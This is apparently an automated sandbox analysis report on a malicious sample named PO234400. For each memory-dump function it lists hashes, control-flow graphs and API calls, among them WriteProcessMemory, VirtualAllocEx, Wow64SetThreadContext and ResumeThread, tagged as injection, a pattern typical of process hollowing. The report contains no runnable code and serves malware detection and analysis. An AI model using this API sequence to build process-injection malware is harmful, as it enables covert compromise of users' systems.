                                                    • Instruction ID: 1f2991f7b536576d8553034ddc98c7bbc44af923281c6b06404da226994beafb
                                                    • Opcode Fuzzy Hash: fd4b1ae37587d5c800844de868db9ea815de23eaf17b7b157310234c0cd46292
                                                    • Instruction Fuzzy Hash: 5141E2B0D00719CBEB24DFAAC8847DEBBB5BF89714F20815AD508AB251DB71A945CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012C590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 234 12c590c-12c5913 235 12c591c-12c59d9 CreateActCtxA 234->235 237 12c59db-12c59e1 235->237 238 12c59e2-12c5a3c 235->238 237->238 245 12c5a3e-12c5a41 238->245 246 12c5a4b-12c5a4f 238->246 245->246 247 12c5a60 246->247 248 12c5a51-12c5a5d 246->248 249 12c5a61 247->249 248->247 249->249
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 012C59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 37a4828a6ef41407544a043f123ad342dc861a2f59e0b58c6ff829ea00ad8fdc
                                                    • Instruction ID: 8d39ab8ef64e61a11c28ac656cb796f76b972f693af601ad5cb73612c5aea2de
                                                    • Opcode Fuzzy Hash: 37a4828a6ef41407544a043f123ad342dc861a2f59e0b58c6ff829ea00ad8fdc
                                                    • Instruction Fuzzy Hash: F64104B0D00719CFEB24DFAAC8847DEBBB5BF85714F20815AD508AB251DB71A946CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17C50 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 251 7b17c50-7b17ca6 253 7b17cb6-7b17cf5 WriteProcessMemory 251->253 254 7b17ca8-7b17cb4 251->254 256 7b17cf7-7b17cfd 253->256 257 7b17cfe-7b17d2e 253->257 254->253 256->257
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B17CE8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 06286c24c0844477f0632395b7280909624c82149a836d960eadcfb32d5159ee
                                                    • Instruction ID: ab5113abd68906b8d443ef44a822d385fb72961df8e568e239bcf3b17b1d5013
                                                    • Opcode Fuzzy Hash: 06286c24c0844477f0632395b7280909624c82149a836d960eadcfb32d5159ee
                                                    • Instruction Fuzzy Hash: 232128B69003199FDB10DFA9C9817EEBBF5FF48320F50842AE959A7240DB789954CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17C58 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 261 7b17c58-7b17ca6 263 7b17cb6-7b17cf5 WriteProcessMemory 261->263 264 7b17ca8-7b17cb4 261->264 266 7b17cf7-7b17cfd 263->266 267 7b17cfe-7b17d2e 263->267 264->263 266->267
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B17CE8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: ca8c49b4183f4138b68b3f7c2a5163ed7b6161adadb15d25cb52e71e29567bf6
                                                    • Instruction ID: 0510e133edd9bff0a286bed1bfdae1c6a9f6691fbbf4f4d9a7bab13768796079
                                                    • Opcode Fuzzy Hash: ca8c49b4183f4138b68b3f7c2a5163ed7b6161adadb15d25cb52e71e29567bf6
                                                    • Instruction Fuzzy Hash: B8212AB19003499FDB10DFA9C881BEEBBF5FF48320F50842AE918A7240DB789554CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17D40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 281 7b17d40-7b17dd5 ReadProcessMemory 284 7b17dd7-7b17ddd 281->284 285 7b17dde-7b17e0e 281->285 284->285
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B17DC8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: bda1d6e4ce2841580a7ef94d3faccf9b1d9de465514c3f2a4bcf0bf800adebb3
                                                    • Instruction ID: 11025feb0a0de6befd0b99ef5edc1f3d8c572aa58660447450247fe3e2b4a5c3
                                                    • Opcode Fuzzy Hash: bda1d6e4ce2841580a7ef94d3faccf9b1d9de465514c3f2a4bcf0bf800adebb3
                                                    • Instruction Fuzzy Hash: DA2128B18003499FDF10DFA9C981BEEBBF5FF48320F50882AE518A7240CB399545CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17AB8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 271 7b17ab8-7b17b0b 273 7b17b1b-7b17b4b Wow64SetThreadContext 271->273 274 7b17b0d-7b17b19 271->274 276 7b17b54-7b17b84 273->276 277 7b17b4d-7b17b53 273->277 274->273 277->276
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B17B3E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: d0e3b4f6598d9ed45f6f6ffbf6e059604043d298d55c3230ef00250ab097fe14
                                                    • Instruction ID: a33a247883d86ccb4ee841856ede1f40bb273da3cb1bdf57798e16157f1d5380
                                                    • Opcode Fuzzy Hash: d0e3b4f6598d9ed45f6f6ffbf6e059604043d298d55c3230ef00250ab097fe14
                                                    • Instruction Fuzzy Hash: 562137B59003098FEB10DFAAC4817EFBBF4EF58220F54842AD559A7240CB789945CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012CD679 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 289 12cd679-12cd714 DuplicateHandle 290 12cd71d-12cd73a 289->290 291 12cd716-12cd71c 289->291 291->290
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD707
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: e883985518c2ee891b6c476201a31357f72acf3051e051fc281844f450b5b380
                                                    • Instruction ID: 22e24aa80035174ed027f3905a129176a30551d351484d02bda774348bcb3a19
                                                    • Opcode Fuzzy Hash: e883985518c2ee891b6c476201a31357f72acf3051e051fc281844f450b5b380
                                                    • Instruction Fuzzy Hash: 5D21E6B5D002499FDB10CFAAD584AEEBFF5FB48320F14811AE954A3350D379A945CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17D48 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 304 7b17d48-7b17dd5 ReadProcessMemory 307 7b17dd7-7b17ddd 304->307 308 7b17dde-7b17e0e 304->308 307->308
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B17DC8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 391d7d37688f6937abbfff267b7d329196f123c1cea900a78e52285f036382d6
                                                    • Instruction ID: 27b2c42ea1aca187a4a916294a6715793252210dc530206ec38d87d0e92df1cd
                                                    • Opcode Fuzzy Hash: 391d7d37688f6937abbfff267b7d329196f123c1cea900a78e52285f036382d6
                                                    • Instruction Fuzzy Hash: F92128B180034D9FDB10DFAAC880BEEBBF5FF48320F50842AE518A7240CB789500CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17AC0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 294 7b17ac0-7b17b0b 296 7b17b1b-7b17b4b Wow64SetThreadContext 294->296 297 7b17b0d-7b17b19 294->297 299 7b17b54-7b17b84 296->299 300 7b17b4d-7b17b53 296->300 297->296 300->299
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B17B3E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 45fed51e722ba7cf9a7a4b5603f9939e6bb023d1966c6099a7a65b9d8fde4ee4
                                                    • Instruction ID: 9dfdfbbf864116a17d6a09c4a354a7400a9f3e2d1148dc02be47e653325851f5
                                                    • Opcode Fuzzy Hash: 45fed51e722ba7cf9a7a4b5603f9939e6bb023d1966c6099a7a65b9d8fde4ee4
                                                    • Instruction Fuzzy Hash: 142118B19003099FEB10DFAAC4857EEBBF4EF88224F54842AD559A7240CB789945CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012CD680 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 312 12cd680-12cd714 DuplicateHandle 313 12cd71d-12cd73a 312->313 314 12cd716-12cd71c 312->314 314->313
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD707
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 504b432b2a2e6ac62beb7c3d86a79f870b723b25963cc9a46ffffaa46bab0240
                                                    • Instruction ID: 39d53ba8335d206b127698a550e26faf58a4838f1ec544812a529e654f7f4766
                                                    • Opcode Fuzzy Hash: 504b432b2a2e6ac62beb7c3d86a79f870b723b25963cc9a46ffffaa46bab0240
                                                    • Instruction Fuzzy Hash: BC21C4B590024D9FDB10CFAAD984ADEBFF9FB48720F14841AE918A3350D374A954CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17B91 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B17C06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 7094dab7ff52a43d3a644369f42f8b792b61178df635d63f6d40da63c2d18553
                                                    • Instruction ID: 658f8bfbe75c4ce1fc2de3ee7def6bcf10cebdb975aacaaa9da58c6476487c9b
                                                    • Opcode Fuzzy Hash: 7094dab7ff52a43d3a644369f42f8b792b61178df635d63f6d40da63c2d18553
                                                    • Instruction Fuzzy Hash: 5E1126B6800249DFDB10DFA9C945BEEBBF5FF48320F14881AE559A7250CB759544CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012CA168 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012CB079,00000800,00000000,00000000), ref: 012CB28A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 2e58d0d5ff811e0925f385612e985c42fc0f6f5dcc887c7ba3a424b4b26414a7
                                                    • Instruction ID: 52ba1b14e8f81315c896120656447229744d5f4d1355dfa4a7d05f52bedd1002
                                                    • Opcode Fuzzy Hash: 2e58d0d5ff811e0925f385612e985c42fc0f6f5dcc887c7ba3a424b4b26414a7
                                                    • Instruction Fuzzy Hash: 9D1103B68003099FDB10DF9AC445BAEFBF9EB89720F10852ED619A7200C375A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012CB218 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012CB079,00000800,00000000,00000000), ref: 012CB28A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: a259bb194d28043e62e9a08f69f8f8763fa5af50a7f94e711166c8072a8a0199
                                                    • Instruction ID: ce4ce72287de7416cd3c73045603785bc62f2787162824dd5525b99de7669adf
                                                    • Opcode Fuzzy Hash: a259bb194d28043e62e9a08f69f8f8763fa5af50a7f94e711166c8072a8a0199
                                                    • Instruction Fuzzy Hash: 431144B68003498FDB10CFAAC445BEEFBF5AB88720F10841EDA18A7200C375A505CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17B98 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B17C06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: dcc172b4165c2ae5958e324253fb0d6a9531bb8dfcffeb24e3c59bbf3f4acb59
                                                    • Instruction ID: 0ddf99d1e495e7d948c680e3b8e2c65fc19f9a05f7e85395d20ac20e2668cb2e
                                                    • Opcode Fuzzy Hash: dcc172b4165c2ae5958e324253fb0d6a9531bb8dfcffeb24e3c59bbf3f4acb59
                                                    • Instruction Fuzzy Hash: 9A1126B58003499FDB10DFAAC844BEEBBF5EF88320F14881AE515A7250CB759540CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17A08 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: cf8b2da2caadb423397f7f2ee0fc5b0bbad99908ac2ee6aa99abce13b6ad2864
                                                    • Instruction ID: eaaea66ec8038bf0ec34f794a0862f07570178197ec4568746fe073b2a5c7c00
                                                    • Opcode Fuzzy Hash: cf8b2da2caadb423397f7f2ee0fc5b0bbad99908ac2ee6aa99abce13b6ad2864
                                                    • Instruction Fuzzy Hash: 501158B1C003498FDB10DFAAC4457EEBBF5EB88220F20881AD519A7250CB399645CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B17A10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: d27a4389cc1d85057045595f215dad35c0009c610be56942c3eb0380aa166bb2
                                                    • Instruction ID: 20bbd81bae03adc71dca23eee2498a38ee826b612ae200b5c5869d9dac9ebaf7
                                                    • Opcode Fuzzy Hash: d27a4389cc1d85057045595f215dad35c0009c610be56942c3eb0380aa166bb2
                                                    • Instruction Fuzzy Hash: 6F1128B1D003498FDB10DFAAC4457AEFBF9AB88620F24845AD519A7240CB75A544CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B1A87C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B1B065
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 0014f4a8012ed69d88f6a74c5db2bf3e1c37262b1be03bf61418bbd84491af6b
                                                    • Instruction ID: aeef93c1c7fd722d720db1d7223397ee3da6cab4e48437fa990865e5ed143b5c
                                                    • Opcode Fuzzy Hash: 0014f4a8012ed69d88f6a74c5db2bf3e1c37262b1be03bf61418bbd84491af6b
                                                    • Instruction Fuzzy Hash: CA11E3B58003499FDB20DF9AC489BDFBBF8FB48720F10845AE514A7200C375A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012CAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 012CAFFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 567583c69b6fb3193eb1a0a642ce1a03b1d45e1f495786fe607b136bb116de4e
                                                    • Instruction ID: 07cd5a48c90007142413cc7a60d1bd2e39b1e29f4aff3303daaa0335266912f7
                                                    • Opcode Fuzzy Hash: 567583c69b6fb3193eb1a0a642ce1a03b1d45e1f495786fe607b136bb116de4e
                                                    • Instruction Fuzzy Hash: DF1113B5C003498FDB14DF9AC444BDEFBF4AB88724F10851AD529A7210D375A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B1B000 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B1B065
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: f9e76866f9b7e7a8659fe2c8d6cb1b5c4166ef94249657110ff338ef1d4a9b0d
                                                    • Instruction ID: 9e4111b15fe40e1a8238ed6eb0b0ed37818b1db885442f317d940b62dd1f3e30
                                                    • Opcode Fuzzy Hash: f9e76866f9b7e7a8659fe2c8d6cb1b5c4166ef94249657110ff338ef1d4a9b0d
                                                    • Instruction Fuzzy Hash: DB11E0B58003499FDB20DF9AC884BDEBBF8EB48320F24845AE558A7641C375A544CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FFD3D8 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376536439.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ffd000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b3447ae3d993e059898b4ae0b05b8477d05c64360068c1d59cf2a7caa037d2cf
                                                    • Instruction ID: 3050fc874fc35a315c93c8c76a7eaf0054b00735950e6af143a8e5500179c0fe
                                                    • Opcode Fuzzy Hash: b3447ae3d993e059898b4ae0b05b8477d05c64360068c1d59cf2a7caa037d2cf
                                                    • Instruction Fuzzy Hash: 89212876504308DFDB04DF10D9C4B26BB66FF94324F20C169DA090B266C336E856EBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0100D1D4 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376642947.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_100d000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfcbd1aa7777e916122958230ab913f95130be3fb1c7cd25cc1e1529544dad9a
                                                    • Instruction ID: 1611bd7ffc5391a6659ef8f79afbdcaad339cfd654b44e4bece940b5151cc227
                                                    • Opcode Fuzzy Hash: cfcbd1aa7777e916122958230ab913f95130be3fb1c7cd25cc1e1529544dad9a
                                                    • Instruction Fuzzy Hash: 68212571604300EFEB02DF94D9C0B25BBA1FB94324F20C5ADE8894B282C736D406CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0100D01C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376642947.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_100d000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c2eb7c3e28b3080cb6ae328941ac7bb3badf04233c4dc0a23616aba99747136f
                                                    • Instruction ID: 5c120c53c8e006ffea3f3d1ddd8f338abec317db8f14a8e74b0fc122f76d908c
                                                    • Opcode Fuzzy Hash: c2eb7c3e28b3080cb6ae328941ac7bb3badf04233c4dc0a23616aba99747136f
                                                    • Instruction Fuzzy Hash: 3121CF756043049FEB16DF94D984B16BBA5EB84224F20C5A9E98E4B286C33AD446CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FFD3D3 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376536439.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ffd000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction ID: 1d0702240b352fb219a91f6a09f7d55b1c070f9b0f5e8e5d1ce8aeb0fa0d25fe
                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction Fuzzy Hash: 5E110376904244CFCB05CF00D5C0B26BF72FF94324F24C2A9D9090B666C33AE856DBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0100D017 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376642947.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_100d000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction ID: bb1012135acf64d8c48323a6a6feca132399cd31976b01ee452f4a5345f2ed0b
                                                    • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction Fuzzy Hash: 1E11BE75504280CFDB12CF94D5C4B15BBA2FB44324F24C6AAE8494B696C33AD40ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0100D1CF Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376642947.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_100d000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction ID: c8c86d44b429e725fbb8a604013f87afe0d76a9b81c106ff4b208f444f95d3cc
                                                    • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction Fuzzy Hash: 3D11BB75504280DFDB02CF98C5C0B15BBA2FB84224F24C6ADD8894B696C33AD40ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FFD759 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376536439.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ffd000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6f2cdef6cbe2cf0dd777ad49689a56ebee77c3cd765a1104ee58a8f10b44c72f
